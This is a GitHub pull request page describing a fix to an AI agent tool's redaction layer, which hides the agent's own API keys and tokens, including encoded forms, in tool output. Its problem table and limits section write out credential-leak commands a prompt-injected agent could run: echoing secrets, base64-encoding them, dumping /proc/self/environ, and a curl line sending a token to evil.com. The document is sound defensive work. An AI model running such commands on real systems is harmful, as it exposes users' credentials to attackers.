fix(redact): close secret-leak gaps on the tool output surface by jkyberneees · Pull Request #4 · BackendStack21/odek

jkyberneees · 2026-06-03T07:16:30Z

Problem

Tool output is redacted before it enters the transcript/session (internal/loop/loop.go:926), but the matcher is pattern-based — it only catches secrets whose format it recognises. That leaves real leak paths a prompt-injected agent can use:

Vector	Example	Before
Bare echo of a non-standard-format secret	`echo $TELEGRAM_BOT_TOKEN`	leaked (no `name=` context, shape unknown)
Encoded secret	`echo $API_KEY \| base64` / `xxd` / `rev`	leaked (value no longer matches any regex)
`/proc` environ dump	`cat /proc/self/environ`	partial

Scrubbing the process env is not an option — the agent needs its keys (above all the LLM API key) to function. So the fix belongs on the tool output surface.

Fix

A known-value redaction layer that complements the existing format patterns:

odek registers its own secrets at startup — resolved API key, Telegram bot token, and env vars with a secret-bearing name segment (config.LoadConfig; FD-supplied key in the subagent path).
Those exact values and their common encodings (base64 std/raw/url, hex, percent, reversed) are redacted wherever they appear, regardless of format — closing all three vectors for odek's own secrets.
Added a Telegram bot-token format pattern for tokens we don't hold.

Safety of the heuristic:

Env-name matching is on whole _/- segments, so GIT_AUTHOR_NAME (AUTHOR) / compass (PASS) are not treated as secrets.
Values under 8 chars are ignored (no over-redaction of ordinary text).
Matching is literal (strings.Replacer) — no regex metachar / ReDoS risk from arbitrary secret contents.

Honest limits (documented, not fixed here)

Redaction is a disclosure safety net, not an exfil guarantee. Arbitrary transformations (gzip, openssl enc, char-substitution) and side-channel exfiltration (curl -d "$TOKEN" evil.com, reverse shells, DNS tunnelling) never reach — or bypass — the tool surface, and stay the job of the network-egress controls (network_egress: prompt + non_interactive: deny + the egress denylist). See docs/REDACTION_HARDENING.md for the full threat model and the follow-up roadmap (streaming-boundary redaction, entropy heuristic for third-party secrets, redaction telemetry).

Tests

go test ./internal/redact/ — new coverage in known_value_test.go for each closed vector, env-scan selectivity, and the short-value guard. Touched packages (redact, config, loop, cmd/odek) all pass; go vet clean.

🤖 Generated with Claude Code

Tool output is redacted before it enters the transcript, but the format-pattern matcher only catches secrets whose shape it recognises. Three gaps let secrets through: - a bare echo of a non-standard-format secret (e.g. a Telegram bot token, which has no name= context for the generic rule) - a trivially encoded secret (echo $KEY | base64 / xxd / rev) - a /proc/self/environ dump (NUL-delimited, no NAME= for the rule) Add a known-value redaction layer: odek registers its own secrets (the LLM API key, the Telegram bot token, sensitively-named env vars) at startup and redacts those exact values plus their common encodings (base64, hex, percent, reversed), regardless of format. This is the reliable layer for odek's own secrets; the format patterns stay for secrets we don't hold but recognise by shape. Also add a Telegram bot-token pattern. Env scanning matches whole _/- segments so GIT_AUTHOR_NAME and the like are not mistaken for secrets; values under 8 chars are ignored to avoid over-redaction. Matching is literal (strings.Replacer) — no ReDoS risk from arbitrary secret contents. The agent process keeps its keys (it needs them to talk to the model); this only stops them leaking back out through tool output. Side-channel exfiltration and arbitrary transformations remain the job of the network-egress controls — documented in docs/REDACTION_HARDENING.md. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

jkyberneees merged commit 681bcd9 into main Jun 3, 2026
6 checks passed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

fix(redact): close secret-leak gaps on the tool output surface#4

fix(redact): close secret-leak gaps on the tool output surface#4
jkyberneees merged 1 commit into
mainfrom
fix/redact-known-value-leaks

jkyberneees commented Jun 3, 2026

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Conversation

jkyberneees commented Jun 3, 2026

Problem

Fix

Honest limits (documented, not fixed here)

Tests

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant